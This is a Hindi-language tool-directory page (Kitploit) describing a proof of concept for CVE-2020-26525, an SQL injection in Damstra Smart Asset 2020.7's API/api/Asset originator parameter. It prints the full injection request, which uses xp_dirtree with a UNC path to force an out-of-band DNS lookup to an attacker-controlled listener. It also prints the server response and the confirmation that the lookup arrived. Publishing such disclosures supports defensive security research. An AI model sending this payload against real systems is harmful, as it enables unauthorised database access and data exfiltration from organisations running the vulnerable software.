Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SmartAsset-SQLinj-CVE-2020-26525 — Damstra Smart Asset 2020.7 में API/api/Asset originator पैरामीटर के माध्यम से SQL इंजेक्शन है। | Kitploit
उपकरण/GitHubGitHub/lukaszstu/smartasset-sqlinj-cve-2020-26525
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHublukaszstu/smartasset-sqlinj-cve-2020-26525

SmartAsset-SQLinj-CVE-2020-26525

Damstra Smart Asset 2020.7 में API/api/Asset originator पैरामीटर के माध्यम से SQL इंजेक्शन है।

रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SmartAsset-SQLinj-CVE-2020-26525

Damstra Smart Asset 2020.7 में API/api/Asset के originator पैरामीटर के माध्यम से SQL इंजेक्शन है।

Smart Asset - संस्करण 2020.7

CVE-2020-26525

==========================

HTTP अनुरोध:

GET /API/api/Asset?assetCode=XXX-08-X-01-06-01& originator=FIRSTNAME.LASTNAME'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c<>%5cqoe'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1 Authorization: Bearer eyJhbGc ... Cookie: _ga=GA1.3.1950130407.1600387365; _gid=GA1.3.1208628208.1600387365; ajs_group_id=null; intercom-id-zk1ecu97=47f0bf3f-35aa-4f97-9239-456XXa65; intercom-session-zkXX97=

==========================

HTTP प्रतिक्रिया:

HTTP/1.1 401 Unauthorized Cache-Control: no-cache Pragma: no-cache Content-Type: application/json; charset=utf-8 <>

"Originator provided does not match originator stored within token!"

==========================

रिमोट लिसनर सर्वर को target.url.com से <> डोमेन नाम के लिए एक A DNS लुकअप प्राप्त हुआ।


[खोजकर्ता] Lukasz Studniarz

टूल डाउनलोड करें